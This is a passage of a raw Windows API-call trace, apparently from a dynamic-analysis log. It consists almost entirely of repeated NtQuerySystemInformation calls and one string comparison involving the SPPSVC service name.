ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x58, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.132] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.134] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd020, Length=0x28, ResultLength=0x0) [0231.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.138] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd110, Length=0x28, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.141] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf80, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf00, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.142] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.143] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x38, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x20, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd568, Length=0x50, ResultLength=0x0) [0231.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2c0, Length=0x28, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd330, Length=0x28, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3b0, Length=0x28, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd490, Length=0x38, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x20, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2a0, Length=0x20, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd410, Length=0x50, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x28, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x28, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0231.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x28, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd340, Length=0x38, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x20, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x20, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.159] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0231.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3f8, Length=0x50, ResultLength=0x0) [0231.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1c0, Length=0x28, ResultLength=0x0) [0231.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x28, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x20, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x20, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0231.176] NtQuerySystemInformation 